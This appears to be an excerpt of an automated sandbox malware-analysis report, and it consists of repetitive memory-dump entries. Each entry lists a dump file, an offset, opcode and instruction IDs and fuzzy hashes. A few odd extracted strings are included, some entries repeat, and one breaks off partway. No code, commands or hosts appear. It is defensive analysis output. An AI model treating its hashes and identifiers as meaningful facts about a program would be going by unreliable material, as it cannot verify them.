                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b801000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: 324263061fdba6c8217528b4c8714af13baa9eab1860b642ea0802d85cd419cf
                                                                                                                    • Instruction ID: 746f1d7e87106e55d745ec7dc1c1411a139633b184664479ab4c188562ea6f6d
                                                                                                                    • Opcode Fuzzy Hash: 324263061fdba6c8217528b4c8714af13baa9eab1860b642ea0802d85cd419cf
                                                                                                                    • Instruction Fuzzy Hash: DFE01A6158F7C44FCB16EB7488698447FA1AE6B21078B40EEC185CF1B3E62D8849C701

                                                                                                                    Control-flow Graph

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7F3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7f3000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2e42c0b840a694982f2bf43641e8c139e1c6228901c0d05fe547effb288cc350
                                                                                                                    • Instruction ID: d7c9ed781fd1d949dbbf755be42fd557e03c9f9e5be81b7eeab954fbb9059ca5
                                                                                                                    • Opcode Fuzzy Hash: 2e42c0b840a694982f2bf43641e8c139e1c6228901c0d05fe547effb288cc350
                                                                                                                    • Instruction Fuzzy Hash: C6A1B470B19A0E8FDB69EF68C4A4AB977E1FF98304B510579D01DC72A6DF34A842C780

                                                                                                                    Control-flow Graph

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b801000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8e61965dff97de1b38abc2694f5c8d3bf2728617538a22804df4f24b98f0466a
                                                                                                                    • Instruction ID: 900048253354fc4310fb3f1c2fbc9cc2cac81ac4715b7dde6e5b0449f54ea1d7
                                                                                                                    • Opcode Fuzzy Hash: 8e61965dff97de1b38abc2694f5c8d3bf2728617538a22804df4f24b98f0466a
                                                                                                                    • Instruction Fuzzy Hash: A7910361B1DA4E0FEBA8EB6884B66B9B2C2EF9C340F0141B9E44DC72D7DD2869454380
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b801000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 971c3f613061439df1688270fd9c141ea5b25e2a73f6630f0babef035b98035e
                                                                                                                    • Instruction ID: 2f0a4320833877f83996181e481642e17678685512114f10b23c51536e13903f
                                                                                                                    • Opcode Fuzzy Hash: 971c3f613061439df1688270fd9c141ea5b25e2a73f6630f0babef035b98035e
                                                                                                                    • Instruction Fuzzy Hash: A7314871A0894A8FE729DF98C8647F57791EF99320F0502BAD44DC32E2DAA86C418781
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7d0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c1155bec562425c9ddb49061954a45548bed7b6a30e008bd6028b2f25a021181
                                                                                                                    • Instruction ID: a86655dac84cf1c1fe66d99487ccc65a83c7114ab7a0cd80f3fe5116544fe3d5
                                                                                                                    • Opcode Fuzzy Hash: c1155bec562425c9ddb49061954a45548bed7b6a30e008bd6028b2f25a021181
                                                                                                                    • Instruction Fuzzy Hash: 7F317330A0964E8FDB45EB68C864AB977F0FFA9340F0546BAD00DD71B2DA38A945CB50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b801000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b801000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 17cb1c085d52b71206f0d04146f224996cca75b8caeedddea856ff774b7f3837
                                                                                                                    • Instruction ID: 08ec8335363fc9ff44d20f9e745f283ee9189c3f77d61ac280bb3958de3c401b
                                                                                                                    • Opcode Fuzzy Hash: 17cb1c085d52b71206f0d04146f224996cca75b8caeedddea856ff774b7f3837
                                                                                                                    • Instruction Fuzzy Hash: 04E01A2194F7C04FC74B9B3588A88447F71AE1721074A51EBC085CF5B3EA2D9849C712
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b801000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 94f1942c652ebc860121753ddcb4975fd86ee220e937a30b52f0c489cf959cb2
                                                                                                                    • Instruction ID: f6de05e86d487be5f64c3e75d67cbcc49a2e1bd894edda6952261ef2ad7c503a
                                                                                                                    • Opcode Fuzzy Hash: 94f1942c652ebc860121753ddcb4975fd86ee220e937a30b52f0c489cf959cb2
                                                                                                                    • Instruction Fuzzy Hash: 3BE04F21689B804FC70A5B2488698943BB1DF6721178A40EBC045CF2B3D61AD849C711
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7d0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ff3051ce8f092a69e22551edfefc58e64b516ddd8f195051f1ddaf51897b9e82
                                                                                                                    • Instruction ID: a80aa5bfc48d3786a4a59c8d186a66ea9d43c30f7b6595992bbdd9d73dbd579e
                                                                                                                    • Opcode Fuzzy Hash: ff3051ce8f092a69e22551edfefc58e64b516ddd8f195051f1ddaf51897b9e82
                                                                                                                    • Instruction Fuzzy Hash: CDE09A70F0D21E87F768A284D8613E87264EBC8340F152378DA0E933E1CE28AE098615
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b801000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                    • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b801000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                    • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b801000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8cbaff0bf46a2870c1cc636a50959592d8509357eac7a33f2741d8249b744a69
                                                                                                                    • Instruction ID: f092c37fb61501de1d7d9567622ca6afd785f4e2401d8c7ce2d0044285a5d487
                                                                                                                    • Opcode Fuzzy Hash: 8cbaff0bf46a2870c1cc636a50959592d8509357eac7a33f2741d8249b744a69
                                                                                                                    • Instruction Fuzzy Hash: 80E04F2194F7C04FC70B973488B88447F60DE1721078E40EAC085CF5B3EA198849C701
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b801000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3929cfd827c69090c6282b0b63111c03cce786f7e2340c836ba06b9c226d2eb5
                                                                                                                    • Instruction ID: d246816b3b619ddbbd259bff5ce5d603c1c5b174f8aa51356f17f622bcc1e232
                                                                                                                    • Opcode Fuzzy Hash: 3929cfd827c69090c6282b0b63111c03cce786f7e2340c836ba06b9c226d2eb5
                                                                                                                    • Instruction Fuzzy Hash: 51E0EC2154EA844FC70A9B2488A99943FB0EF2621178A01E6C449CF5B3E65A9C89C752
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b801000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                    • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                    • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                    • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b801000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 326fddfa3e6338c3e5d2f0e00ff13dfa1b6452360b5d368467cabd64d0f95c06
                                                                                                                    • Instruction ID: db5c5ec157326e3d5525c09028612764162e24c9b5b858856863f12583aef4a5
                                                                                                                    • Opcode Fuzzy Hash: 326fddfa3e6338c3e5d2f0e00ff13dfa1b6452360b5d368467cabd64d0f95c06
                                                                                                                    • Instruction Fuzzy Hash: ACD02230B509040FC71CA73C8C588703390EBAE20278100A8D00BC72B2D92ADC89C740
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b801000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                                                                                    • Instruction ID: edc95da55bbf175c2dbf557ae9e990bb90a5868c6e144bfcc50b23835cab04b0
                                                                                                                    • Opcode Fuzzy Hash: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                                                                                    • Instruction Fuzzy Hash: 4ED01234B519044FC71CA73C88598747391EB6E2167D540A9D00AC72B5E96ADD89C781
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7d0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                    • Instruction ID: a7ccde51ffaebf982fee43da4dd1b920e211f0f70841fa5207d4da50c9dd1c1f
                                                                                                                    • Opcode Fuzzy Hash: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                    • Instruction Fuzzy Hash: 0CE01234B0930ECBE710DB94C4A46ED7761EB91751F504365C405872E9DA786788C680
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5fb8d9d9cda7e7fa439ae7f2e089c60b770e96dab7b1b55962544499104dd7c1
                                                                                                                    • Instruction ID: fbdd5c4b5fff347f9e6f1c977a1816f8087de09adc33b0b713bf33043c82925e
                                                                                                                    • Opcode Fuzzy Hash: 5fb8d9d9cda7e7fa439ae7f2e089c60b770e96dab7b1b55962544499104dd7c1
                                                                                                                    • Instruction Fuzzy Hash: 41E0EC30E0962ECAE7B0DB54C8947AC72A1BF08301F9503F5C00DA31B5CB796E819B41
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a7cfc572cdebb4dde5388e471b9b96557620e28f591995bb88b2115411df963a
                                                                                                                    • Instruction ID: 96111e4814882116b39774a90f1dfd4572fbfc004994c8cc9b03902f48835ef8
                                                                                                                    • Opcode Fuzzy Hash: a7cfc572cdebb4dde5388e471b9b96557620e28f591995bb88b2115411df963a
                                                                                                                    • Instruction Fuzzy Hash: B2D09E74E1895ECAEB58EB94C865ABDB6B1BF84304F410175D02DA32EECF3829024741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7d0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: de2f115ada3591e00aa73595d14502d526454d2b9e7ce6b69c2b2684b7b4a166
                                                                                                                    • Instruction ID: dc36e34ba390c49d92610d305e4f9062a511a198adc23c72ddc40da4ce46ae6c
                                                                                                                    • Opcode Fuzzy Hash: de2f115ada3591e00aa73595d14502d526454d2b9e7ce6b69c2b2684b7b4a166
                                                                                                                    • Instruction Fuzzy Hash: FDC08C00F0CD2A06F75AA204243067D08025F80208F8107B0E41E877DECD0C1E0212CB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: =N_^$N_^%$N_^($N_^*$N_^+$N_^2$N_^4
                                                                                                                    • API String ID: 0-1975945381
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: =N_^$N_^($N_^*$N_^+$N_^2$N_^4
                                                                                                                    • API String ID: 0-837699881
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: N_^*$N_^+$N_^2$N_^4
                                                                                                                    • API String ID: 0-2488992247